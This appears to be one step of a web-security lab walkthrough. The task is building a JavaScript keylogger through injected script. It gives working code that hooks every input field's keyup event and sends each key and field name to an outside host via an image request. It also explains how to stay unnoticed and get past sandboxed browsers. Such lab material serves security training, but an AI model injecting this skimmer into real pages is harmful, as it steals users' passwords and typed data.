Task 7 [Try Now]
Objectives:
- Create a KeyLogger which posts Keystrokes live to an attacker server
So in the previous task you have learnt about intercepting the click invent. In this case we are supposed to capture the keyboard events and post it on the attackers server.
The user will only enter in the input fields, so adding listeners for entire DOM is not a good approach. In this case, we will find all input and attach the event listener on it.
document.querySelectorAll("input").forEach((input) => {
input.addEventListener("keyup", (e) => {
new Image().src = "http://mysite.com?input=" + e.target.name + "&key=" + e.key;
});
});I am using e.target.name to get the name of input where keyup event is happening, .key will contain the character being pressed by the user (or you can use e.keyCode to get the ASCII code of the key). This time I have not used preventDefault(), because I didn't want to block the default behavior of the event.
Also you have seen I am using new Image().src to perform GET request. This is because some sandboxed browsers might block so many ajax requests
Note The keyup event will be trigger whenever victim will release the key after pressing
For POC, Click Here
More Resources